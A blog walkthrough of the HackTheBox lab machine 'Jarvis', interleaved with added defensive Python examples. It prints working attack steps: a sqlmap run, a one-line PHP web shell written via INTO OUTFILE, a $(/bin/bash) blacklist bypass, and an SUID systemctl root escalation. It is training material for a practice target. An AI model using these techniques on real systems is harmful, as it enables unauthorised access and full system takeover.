Jarvis: Hackthebox walkthrough


Hey all! This is Shreya Pohekar. This walkthrough will solve Jarvis from hackthebox.

Jarvis is an easy Linux machine. The initial foothold on the box comes from exploiting a SQL injection to obtain the creds of DBadmin. phpMyAdmin is reachable by users and can be logged into with those creds, and the initial shell is obtained by writing a web shell onto the box from there.
Escalation to user exploits a Python file that can be run with the privileges of that user.
Finally, elevating to root is based on exploiting systemctl, since the user can run the binary.

With all that said, let's get started!

Starting with an nmap scan, I found two open ports, 22 and 80:

# nmap -sC -sV -o jarvis.nmap 10.10.10.143

So, obviously, further recon has to start with port 80.

Upon visiting http://10.10.10.143, a landing page came up.

On the top left, supersecurehotel.htb was written, so I added an entry to /etc/hosts to check whether a different page would come up. It didn't!

Getting the initial shell

Clicking through the buttons (Book Now), I found room.php, which takes a parameter cod.

In the URL I tried appending a quote after cod=3 (as cod=3') and the page acted weird. I realized this could be a SQL injection point, so I quickly captured the request in Burp and copied it to a file named room.req:

GET /room.php?cod=1 HTTP/1.1
Host: supersecurehotel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=ai7hje9buh3uscu5n5hgs9uff5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

I ran sqlmap over the saved request:

# sqlmap -r room.req  --batch --all

In the SQL dump I found the password for DBadmin to be imissyou.
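To show why a single quote in cod breaks the page and why a parameterised query does not, here is a small added example of my own (not code from the original post or from the box). It uses an in-memory SQLite table with constructed room rows as a stand-in for the real room.php query, which is not reproduced on the page.

```python
import sqlite3


def build_db():
    """Constructed sample data standing in for the hotel's room table (not the box's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE room (cod INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    conn.executemany(
        "INSERT INTO room VALUES (?, ?, ?)",
        [(1, "Superior Family", 170), (2, "Double Room", 120), (3, "Single Room", 80)],
    )
    return conn


def lookup_room_unsafe(conn, cod):
    """The pattern behind room.php?cod=...: user input pasted straight into SQL text."""
    sql = f"SELECT cod, name, price FROM room WHERE cod = {cod}"
    return conn.execute(sql).fetchall()


def lookup_room_safe(conn, cod):
    """Parameterised query: the value travels separately from the statement, so quotes or
    keywords inside it can never change the statement's structure."""
    return conn.execute("SELECT cod, name, price FROM room WHERE cod = ?", (cod,)).fetchall()


def probe(conn, cod):
    """Return ('ok', rows) or ('error', message) for the unsafe lookup, mimicking what a
    tester sees: a bare quote produces a database error (the 'weird' page)."""
    try:
        return ("ok", lookup_room_unsafe(conn, cod))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    print(probe(db, "3"))            # normal lookup
    print(probe(db, "3'"))           # quote breaks the SQL: error, the symptom seen on room.php
    print(lookup_room_safe(db, "3'"))  # same input treated as a literal value: no rows, no error
```

The unsafe version also returns every row for an input such as `1 OR 1=1`, which is exactly the behaviour sqlmap builds on; the safe version returns nothing for it, because the whole string is compared as one value.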

Alongside manual enumeration, I spawned a gobuster scan that listed a few accessible directories, one of them being phpmyadmin. I could possibly log in to the dashboard with the creds obtained.

# gobuster dir --url http://10.10.10.143 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Visiting http://10.10.10.143/phpmyadmin brought up a login page, and I entered the creds.

Kudos!! Got access to the dashboard.

Scrolling through all the databases, I found nothing interesting.

I then realized that a web shell can be written to the web root by running SQL commands.

So I went to the SQL query section and ran the following command:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"

The query writes a simple web shell into a file backdoor.php in the web root (/var/www/html).

The query ran successfully, and the file was now in place.

I checked for the file by visiting http://10.10.10.143/backdoor.php; a blank page confirmed its presence.

I captured this request in Burp and pasted in a reverse shell from pentestmonkey.

You can URL-encode the shell in Burp with Ctrl+U. I also opened a nc listener on port 1234.

And got a shell as www-data.
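From the defender's side, the web shell leaves a clear trace in the web server's access log: a PHP file that is not part of the application, hit with a command-style query parameter. The detector below is an added example of mine, not something from the original post; the log lines are constructed in the Apache combined format, and the set of known application pages is an assumption you would replace with your own list.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not real logs from the box) covering normal use,
# the phpMyAdmin visit, the blank-page check and two command executions.
SAMPLE_LOG = """\
10.10.14.2 - - [12/Jun/2020:10:01:03 +0000] "GET /room.php?cod=3 HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
10.10.14.2 - - [12/Jun/2020:10:05:40 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.10.14.2 - - [12/Jun/2020:10:09:12 +0000] "GET /backdoor.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.2 - - [12/Jun/2020:10:09:55 +0000] "GET /backdoor.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
10.10.14.2 - - [12/Jun/2020:10:10:30 +0000] "GET /backdoor.php?cmd=python%20-c%20... HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names commonly used by one-line PHP web shells (assumption; extend as needed).
SUSPICIOUS_PARAMS = {"cmd", "exec", "command", "c"}


def parse_line(line):
    """Split one access-log line into its fields plus the decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded
    return rec


def flag_webshell_requests(log_text, known_paths):
    """Return (kind, ip, path, detail) findings.

    kind is 'unknown-php' for any .php path outside the known application pages
    (a dropped file like backdoor.php) and 'command-param' when such a request also
    carries a command-style parameter (the shell actually being used)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith(".php"):
            continue
        if rec["path"] in known_paths:
            continue
        findings.append(("unknown-php", rec["ip"], rec["path"], ""))
        for param, values in rec["query"].items():
            if param.lower() in SUSPICIOUS_PARAMS:
                findings.append(("command-param", rec["ip"], rec["path"], f"{param}={values[0]}"))
    return findings


if __name__ == "__main__":
    # Assumed application inventory for supersecurehotel.htb; build yours from the deployed code.
    for finding in flag_webshell_requests(SAMPLE_LOG, {"/index.php", "/room.php"}):
        print(*finding)
```

Pairing this with a file-integrity check on /var/www/html catches the earlier step too: the INTO OUTFILE write shows up as a new PHP file owned by the database user rather than the deployment account.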

Escalation to user : Pepper

I then ran linpeas.sh on the box and found that www-data is allowed to run /var/www/Admin-Utilities/simpler.py with the privileges of user pepper.

I looked at the contents of the file and found a method that was pretty interesting. os.system is called, but to make things difficult, the developer has forbidden certain characters.

After trying for a while, I found that $(command) works as a bash command substitution, so the weak sanitization can be bypassed.

method in simpler.py

So running $(/bin/bash) executed the binary with the privileges of pepper and got us a shell.
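The lesson in simpler.py is that a character blacklist in front of os.system is not input validation. The example below is mine, added to illustrate that point; it is not the script from the box. The forbidden-token list is a constructed stand-in (the page does not reproduce the real one), and the hardened version replaces the blacklist with an allowlist (the value must parse as an IP address) and an argv list passed to subprocess without a shell, so substitution syntax is never interpreted.

```python
import ipaddress
import subprocess

# Constructed stand-in for a character blacklist guarding an os.system("ping ...") call.
# The real simpler.py list is not shown on the page; this one is an assumption.
FORBIDDEN = ["&", ";", "-", "`", "||", "|"]


def passes_blacklist(value):
    """Blacklist approach: accept anything that contains none of the forbidden tokens."""
    return not any(token in value for token in FORBIDDEN)


def validate_target(value):
    """Allowlist approach: the input must be a literal IP address, otherwise it is rejected."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


def build_ping_command(value):
    """Return the argv list for one ping of the validated target, or None if rejected.
    Because the list is handed to subprocess with shell=False, no shell ever parses it."""
    target = validate_target(value)
    if target is None:
        return None
    return ["ping", "-c", "1", target]


def run_ping(value):
    """Hardened equivalent of the script's ping feature: returns 'rejected' or ping's exit code."""
    argv = build_ping_command(value)
    if argv is None:
        return "rejected"
    return subprocess.run(argv, capture_output=True, text=True).returncode


if __name__ == "__main__":
    for candidate in ["10.10.14.2", "10.10.14.2; id", "$(/bin/bash)"]:
        print(f"{candidate!r:22} blacklist={passes_blacklist(candidate)} "
              f"allowlist={'ok' if build_ping_command(candidate) else 'rejected'}")
```

The blacklist lets `$(/bin/bash)` through because none of its characters are on the list, which is precisely the bypass the page describes; the allowlist rejects it because it is not an IP address, and even a value that slipped past validation would reach ping as a plain argument rather than as shell syntax.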

But the shell wasn't good (it didn't give any output for commands).

So I opened another listener, on port 8888, and entered a reverse shell from pentestmonkey in the shell I had obtained.

To get a proper shell, perform the following steps (optional):

# python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
# stty raw -echo;
# fg (then press Enter twice and you are back in the shell)
# stty rows 34 cols 134
# export TERM=xterm

Privilege escalation to root

Earlier, in the enumeration phase with linpeas.sh, I had found that systemctl had the SUID bit set, was owned by root and belonged to the pepper group, which was interesting. Now that I am pepper, I can escalate my privileges to root.

We can also find this out with the command

# find / -perm -4000 2>/dev/null
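A defender runs the same check the other way round: list SUID binaries and compare them with a baseline, so a stray bit on something like systemctl stands out. The script below is an added example of mine (not from the post); the baseline set is a constructed assumption for a Debian-style host, and the path /bin/systemctl in the sample entries is likewise constructed.

```python
import os
import stat

# Constructed baseline of SUID binaries expected on a stock Debian-style host.
# This is an assumption for the example; build your own from a known-good image.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/mount", "/usr/bin/umount",
}


def is_suid(mode):
    """True for a regular file whose mode carries the set-user-ID bit (find / -perm -4000)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def unexpected_suid(entries):
    """Given (path, mode) pairs, return the sorted SUID paths that are not in the baseline."""
    return sorted(path for path, mode in entries if is_suid(mode) and path not in EXPECTED_SUID)


def walk_modes(root="/"):
    """Yield (path, mode) for every regular file under root, skipping unreadable entries."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                yield path, st.st_mode


def audit(root="/"):
    """Walk the filesystem and report SUID binaries outside the baseline."""
    return unexpected_suid(walk_modes(root))


if __name__ == "__main__":
    for path in audit("/"):
        print("unexpected SUID binary:", path)
```

Run it from cron or a configuration-management check; on this box it would report systemctl, and the fix is simply removing the bit (chmod u-s), since systemctl is never meant to be SUID.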

I googled privilege escalation with systemctl and got a link to GTFOBins. Nothing could be better!!

mktemp creates a temporary file beneath the specified directory (/tmp by default).
We echo a basic shell into that file, which will run with elevated privileges.
SYSTEMD_EDITOR tells systemctl which editor to launch when editing system.slice, so the SUID systemctl runs $TF in place of an editor.

Note: A slice unit is a concept for hierarchically managing the resources of a group of processes. Service and scope units are placed in system.slice by default.

# TF=$(mktemp)
# echo /bin/sh > $TF
# chmod +x $TF
# SYSTEMD_EDITOR=$TF systemctl edit system.slice

And root is owned!!

That's all for the blog post!! Thanks for reading!! If you enjoyed the post, do like it!

Until then, Happy Hacking!!

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as an iOS and Angular developer. I am also a contributor to the CodeVigilant project. My blogs are focused on infosec and dev and their how-tos.

This Post Has One Comment

  1. Frank

    Way cool! Some extremely valid points! I appreciate you writing this
    article and also the rest of the site is really good.
